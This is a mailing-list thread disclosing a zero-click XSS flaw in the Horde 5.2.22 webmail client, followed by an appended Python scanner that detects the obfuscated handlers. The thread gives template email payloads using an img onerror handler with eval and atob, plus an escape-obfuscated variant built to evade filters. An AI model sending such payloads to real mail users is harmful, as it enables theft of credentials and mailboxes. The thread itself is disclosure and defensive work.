[imp] Horde v 5.2.22 vulnerability – obfuscation via HTML encoding – XSS payload
azurit at pobox.sk
Fri Mar 21 09:40:14 UTC 2025
Hi,
is Horde 5.2.23 / 5.2.24 affected?
azurit
Quoting "Nataša K. Arh" <natasa.jakec at gmail.com>:
> Hi.
>
> I forgot to mention that currently the fastest way to mitigate the
> vulnerability is to disable HTML email view and enable only text/plain view
> of the email content.
>
>
> Regards, Tasha & Vito
>
> On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.jakec at gmail.com>
> wrote:
>
>> Hi.
>>
>> A vulnerability within Horde Web Client was discovered during our
>> investigation. We have already seen this vulnerability being exploited in
>> the wild.
>>
>> If an attacker crafts a specially prepared email, he/she can abuse this
>> vulnerability to retrieve username, password and complete email database
>> of a user mailbox.
>>
>>
>> *Details*
>>
>> The content inside the email's base64 encoded text/html boundary contains
>> specially crafted HTML.
>>
>>
>> --===============boundary==
>> Content-Type: text/html; charset="utf-8"
>> Content-Transfer-Encoding: base64
>> MIME-Version: 1.0
>>
>> Injecting an XSS payload inside an HTML attribute, namely the "onerror"
>> event handler, the server-side checks do not sanitize the payload and
>> do not detect HTML encoded characters.
>>
>> When the browser renders the page, it will decode and execute the injected
>> payload.
>>
>> This is injected at the end of the legit HTML content.
>>
>>
>> Example:
>>
>> <html>
>> <body>
>> <p>Hi...</p>
>> Regards<br>
>> <math><style>
>> <img style=display:none src=nonexsisting.png
>> onerror="window.parent.eval(window.parent.atob('base64 encoded
>> JavaScript'));">
>> </style></math>
>> </body></html>
>>
>>
>> To evade detection Unicode characters can be used:
>> For eval:
>> - \u{065} represents the Unicode character for the letter "e."
>> - \u{076} represents the Unicode character for the letter "v."
>> - \141 (octal) or \x6C (hexadecimal) represents the letter "a."
>> - \x6C represents the hexadecimal for the letter "l."
>>
>> For atob:
>> - \u{61} represents the Unicode character for the letter "a."
>> - \u{74} represents the Unicode character for the letter "t."
>> - o is a regular character.
>> - \142 (octal) represents the letter "b."
>>
>> Example:
>>
>> <html>
>> <body>
>> <p>Hi...</p>
>> Regards<br>
>> <math><style><img style=display:none src=nonexsisting.png
>> onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64
>> encoded JavaScript'))"></style></math>
>> </body></html>
>>
>> The “nonexsisting.png” image is searched inside /imp, since it does not
>> exist the “onerror” content is executed.
>>
>> Specially crafted JavaScript code inside the 'base64 encoded
>> JavaScript' is executed.
>>
>> This kind of crafted email is a zero-click attack, where no click is
>> needed from the user's side other than looking at this email in the Horde web
>> client.
>>
>> Since there are still Horde web clients used, it would be nice to fix this
>> vulnerability.
>>
>> --
>> Regards.
>>
> --
> imp mailing list
> Frequently Asked Questions: http://wiki.horde.org/FAQ
> To unsubscribe, mail: imp-unsubscribe at lists.horde.org
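An added example, not code from this thread or from the Horde project: a Python scanner for incoming text/html parts that undoes the HTML entity and JavaScript string-escape obfuscation described above before checking event-handler attributes for eval/atob, so the check sees what the browser would execute rather than the raw bytes. The sample message is constructed for the example, with the base64 payload replaced by the placeholder 'QUJD'.

```python
import base64
import html
import re

# Matches an on* event-handler attribute (double-quoted, single-quoted or bare value).
HANDLER_RE = re.compile(r'\bon[a-z]+\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.I)
# JavaScript string escapes used for obfuscation: \u{...}, \uXXXX, \xHH and octal \NNN.
ESCAPE_RE = re.compile(
    r'\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})')
# Names that should never appear in a mail-borne handler once the obfuscation is undone.
SUSPICIOUS = ("eval", "atob")


def decode_js_escapes(text):
    """Undo JS string escapes the way the JS engine does when it parses the literal."""
    def repl(m):
        if m.group(4) is not None:          # octal escape, e.g. \141 -> 'a'
            return chr(int(m.group(4), 8))
        hex_digits = m.group(1) or m.group(2) or m.group(3)
        return chr(int(hex_digits, 16))     # \u{065}, \u0065 or \x65 -> 'e'
    return ESCAPE_RE.sub(repl, text)


def scan_html(markup):
    """Return one finding per event handler that resolves to eval/atob after decoding."""
    findings = []
    for m in HANDLER_RE.finditer(markup):
        raw = next(g for g in m.groups() if g is not None)
        # The browser entity-decodes the attribute first, then the JS engine decodes escapes.
        decoded = decode_js_escapes(html.unescape(raw))
        hits = [name for name in SUSPICIOUS if name in decoded]
        if hits:
            findings.append({"handler": raw, "decoded": decoded, "hits": hits})
    return findings


def scan_mime_part(body_b64):
    """Scan a base64 text/html MIME body as it arrives, before any client renders it."""
    return scan_html(base64.b64decode(body_b64).decode("utf-8", "replace"))


# Constructed sample modelled on the obfuscated message in the thread (payload replaced by 'QUJD').
SAMPLE_HTML = (
    "<html><body><p>Hi...</p>Regards<br>"
    "<math><style><img style=display:none src=nonexsisting.png "
    r"""onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('QUJD'))">"""
    "</style></math></body></html>"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_HTML.encode("utf-8")).decode("ascii")
```

Run scan_mime_part(SAMPLE_B64) on the constructed part and the finding's decoded handler reads window.parent['eval'](window.parent['atob']('QUJD')), which is what a raw string match on the base64 body or on the escaped attribute would miss.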